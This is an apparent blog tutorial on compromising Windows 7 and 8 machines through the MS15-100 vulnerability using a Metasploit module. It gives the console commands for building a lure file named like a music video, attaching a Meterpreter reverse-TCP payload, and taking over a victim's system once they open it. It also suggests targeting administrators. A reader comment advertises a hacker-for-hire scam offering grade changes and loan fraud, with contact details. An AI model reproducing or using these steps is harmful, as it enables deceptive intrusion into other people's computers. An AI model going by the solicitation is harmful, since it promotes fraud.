How to hack Windows vista, 7 & 8 using kali linux

Microsoft Security Bulletin MS15-100 - Important

Here is what Microsoft said about this vulnerability (MS15-100) in their Microsoft Security Bulletin on TechNet:

Although the vulnerability has been patched, many systems don't have automatic patching for a number of reasons, especially within corporate, large institution, and military installations.


Just a warning. This hack is not for the newbie. I requires significant knowledge of both Linux and Metasploit to work.

Step 1: Fire up Kali

Our first step, of course, is to fire up Kali. This exploit requires that you have Ruby 2.1 on your Kali system, so if you are using Kali 1.1 or earlier, you will need to upgrade your Ruby. Kali 2.0 has the upgraded Ruby, so there's no need to upgrade.

Step 2: Go to Exploit-DB

Next, let's go to the Exploit-DB. Under the Remote Code Execution Exploits section, we can find the exploit under its Microsoft designation, MS15-100.

ImportantHow to find Exploits using Exploit Database in kali linux


When we select this exploit, it brings up the Metasploit code that we must add to our Metasploit framework. Copy and paste it to a text file in Kali.



Step 3: Add New Module to Metasploit

Earlier this year, I wrote a tutorial on How to install new module in Metasploit, so please refer to that if you need more help on this subject. You will need to add this module to your Metasploit framework before we can proceed. Name it ms15_100_mcl.rb. It may be that by the time you read this article, Rapid7 will have added this module to the framework and you won't need to add the module, but time is critical here.

Step 4: Start Metasploit & Search for New Module

Once you have added the module to Metasploit, start (or restart) Metasploit and search for the module to make certain it is available to you.

msf > search ms15_100


If you find it, we are ready to roll!

Step 5: Load New Module

We now need to load the module:

msf > use exploit/windows/fileformat/ms15_100_mcl

This loads this exploit into memory.

Step 6: Info

Now that we have loaded the module, let's type info to see what requirements this module needs.

msf > info



As you can see, we need to provide this module both the FILENAME and FILE_NAME. One is the .mcl file (FILENAME) and the other is the malicious file (FILE_NAME) we will load on to the victim's system.

Step 7: Set Options

As you can see in the screenshot above, this module will require that we set the name of the .mcl file (FILENAME) and the name of malicious payload (FILE_NAME). In an attempt to entice the victim to open my .mcl link, I'll call it best_music_video_ever.mcl.

msf > set FILENAME best_music_video_ever.mcl

msf > set FILE_NAME best_video.exe

We also need to set a payload. In this case, I will use the Windows Meterpreter.

msf > set PAYLOAD windows/meterpreter/reverse_tcp



Finally, we just type exploit.

msf > exploit



Finally, we just type exploit.

Metasploit saved the file at /root/msf4/local/best_music_video_ever.mcl. That is the file we need to get to the victim!

Step 8: Send the MCL File to the Victim

Metasploit has now created our .mcl file and opened a share on the network. We now need to send this file, one way or another, to the victim and get them to open it.


Note in the screenshot above that the victim's Windows 7 system has the MCL file, best_music_video_ever.mcl on their desktop.

Step 9: Take Control of the System

When the victim clicks on the .mcl link to watch the "Best Music Video Ever," it will connect back to our Kali system opening a Meterpreter session. In my case, the session did not automatically open in Metasploit, but when I typed:

msf > sessions -l

I received this response showing me that a session had been opened on the victim machine. Success!



Now that I have a Meterpreter session, I can do just about anything on this system within the privileges I came in on. Since this exploit comes in with the privileges of the user, I will be limited to the privileges of the user who clicked on the .mcl file. Obviously, if we can get an administrator to click on this file, we will come in with their privileges, which would be much more powerful.


For Latest tricks go Click on 

Comments

  1. He is no scam,i tested him and he delivered a good job,he helped me settle bank loans,he also helped my son upgrade his scores at high school final year which made him graduate successfully and he gave my son free scholarship into the college,all i had to do was to settle the bills for the tools on the job,i used $500 to get a job of over $50000 done all thanks to Walt,he saved me from all my troubles,sharing this is how i can show gratitude in return for all he has done for me and my family

    Gmail; Brillianthackers800@gmail.com
    Whatsapp number; +1(224)2140835

    ReplyDelete
  2. We will be getting a reverse TCP connection from the victim machine by using a small backdoor hack windows 7 using metasploit.

    ReplyDelete

Post a Comment

Popular Posts